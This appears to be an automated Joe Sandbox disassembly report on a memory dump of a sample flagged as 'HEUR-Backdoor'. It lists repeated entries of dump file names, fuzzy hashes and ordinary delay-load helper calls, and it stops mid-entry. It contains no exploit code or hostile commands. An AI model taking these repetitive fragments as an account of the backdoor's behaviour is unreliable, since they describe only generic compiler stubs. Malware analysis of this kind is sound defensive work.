• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 21e99585497217588c4d414fca0284bc9481d366de2091460f2e17859425c73b
• Instruction ID: 260a3865ba837b19c1960c431994453461c328634f065841d05bc827d8027a75
• Opcode Fuzzy Hash: 21e99585497217588c4d414fca0284bc9481d366de2091460f2e17859425c73b
• Instruction Fuzzy Hash: 18B012E637E082AC315C9146AD1BE37025CE0C8B20330801AB219D02C0EA484C0D4031
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
Memory Dump Source
• Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 239239b8c92ddb0628d9516b6c2bfae9b2e978422e928634fe6818feac2962d1
                                                • Instruction ID: e74a027455f35a0e01a80eb4d9dcac7cef1f7b6ee2af5b94ce6659fb44529248
                                                • Opcode Fuzzy Hash: 239239b8c92ddb0628d9516b6c2bfae9b2e978422e928634fe6818feac2962d1
                                                • Instruction Fuzzy Hash: F8B012E637E042EC315C9146AC1BE3702ACE0C8B20330801AB519D12C0EA484C0C4031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: d1c0478d2b31b6fd9974e9ea5593c3fbc1c08ce1247842a0238a07f608b3c58a
                                                • Instruction ID: e80923f91f171207d189a7fe22f812ed2dc0c59f98c4d829c5eef61a99797ce7
                                                • Opcode Fuzzy Hash: d1c0478d2b31b6fd9974e9ea5593c3fbc1c08ce1247842a0238a07f608b3c58a
                                                • Instruction Fuzzy Hash: E6B012E637E041AC315C91566D1BF36021CF0C8B20330402AB12AD02C0EA484C0C4031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 65c68a5d4bf5b772db154e30ff14631c3aee20edeb5ede257b7527e705758259
                                                • Instruction ID: 780ae93a044211ce8117293ffbbfaa60582b3987d464d7cea96e4623a3e94f1f
                                                • Opcode Fuzzy Hash: 65c68a5d4bf5b772db154e30ff14631c3aee20edeb5ede257b7527e705758259
                                                • Instruction Fuzzy Hash: F0B012E637E146BC325C5142BC1BD37021CE0C4B20330412AB115E01C0EA484C4C4031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: c9ed425d4fcfeefad04413c1e2e9ea5477e3c51a0fde3eb147d6328c5496eb29
                                                • Instruction ID: ebebe4f49e59c893060b97c822546ab193556a71d5f9fc5577e8160f590c268c
                                                • Opcode Fuzzy Hash: c9ed425d4fcfeefad04413c1e2e9ea5477e3c51a0fde3eb147d6328c5496eb29
                                                • Instruction Fuzzy Hash: 0BB012A527E241AC315CB14AAD06D3E022CE0C8B50330451BB219D12E0E588BC084031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 64f63658bb1a58012e32ffa7b203d7fa42fa3bb644487e592b9709f5e509c1e8
                                                • Instruction ID: a9e8def5ad15326a89c65ab925cb37bc70f9d23c8d1544d40b6a146eacf8b271
                                                • Opcode Fuzzy Hash: 64f63658bb1a58012e32ffa7b203d7fa42fa3bb644487e592b9709f5e509c1e8
                                                • Instruction Fuzzy Hash: 31B012A526E141AC315CB14AAD06D3E022CD0CCB50330851AB619D12E0E5887C084031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: e342e26f93175b614217d3be0b6bfb4ea11e89882c2d23f9391c95cfecdbccf3
                                                • Instruction ID: b57560ec9f52928f07703346908e0aa4519e46db5c68ae73da57fabcdc6020f4
                                                • Opcode Fuzzy Hash: e342e26f93175b614217d3be0b6bfb4ea11e89882c2d23f9391c95cfecdbccf3
                                                • Instruction Fuzzy Hash: 38B012A526E241BC315C7146BF06C3E022CD1C8B50330461AB215E01E0A5C87C485031
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 6d6f64c7ed9a590d9b3ba5c47f3d261178fc78b03bb7bb7e862f9bdb403b39e4
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 6d6f64c7ed9a590d9b3ba5c47f3d261178fc78b03bb7bb7e862f9bdb403b39e4
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 4c39061c71380cdf304b90c55979c21561cf24e4c1f786ad2d3a2b7896d13983
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 4c39061c71380cdf304b90c55979c21561cf24e4c1f786ad2d3a2b7896d13983
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 56f1383f3ffa79a30de972ac1897f3ee78d14344bc3cf408bfebe8d35965619d
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 56f1383f3ffa79a30de972ac1897f3ee78d14344bc3cf408bfebe8d35965619d
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 7b98bb3a143ad546a53d2564d7c7440c72edc54703c45cc6a578a4e4664fb949
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 7b98bb3a143ad546a53d2564d7c7440c72edc54703c45cc6a578a4e4664fb949
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: e6e6dbf2056e80121c51dd1e6a716d8d3fb20edb0001303c159d6dcfb9be904e
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: e6e6dbf2056e80121c51dd1e6a716d8d3fb20edb0001303c159d6dcfb9be904e
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: f69c8c4edfb901030569601d8de2988204d5155fb18ece74099792991bf3cbc3
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: f69c8c4edfb901030569601d8de2988204d5155fb18ece74099792991bf3cbc3
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 51c2fdc0ae1090d0fc9adb8685b48090474ed3ce06e17074a968a3f7d8f30774
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 51c2fdc0ae1090d0fc9adb8685b48090474ed3ce06e17074a968a3f7d8f30774
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
